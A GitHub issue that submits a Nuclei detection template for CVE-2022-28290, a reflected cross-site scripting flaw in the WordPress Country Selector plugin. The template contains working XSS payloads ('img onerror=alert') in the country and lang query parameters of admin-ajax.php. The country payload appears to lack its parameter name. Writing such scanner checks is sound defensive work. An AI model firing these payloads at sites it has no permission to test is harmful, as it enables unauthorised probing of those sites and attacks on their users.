### ISSUE TITLE
CVE-2022-28290

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4336]
```yaml
id: CVE-2022-28290

info:
  name: Country Selector < 1.6.6 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape the country and lang parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479
  tags: xss,wp,wordpress,wp-plugin,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=check_country_selector&<img+src=x+onerror=alert(/XSS-country/)>&lang=<img+src=x+onerror=alert(/XSS-lang/)>&site_locate=en-US'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(/XSS-country/)>'
          - '<img src=x onerror=alert(/XSS-lang/)>'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
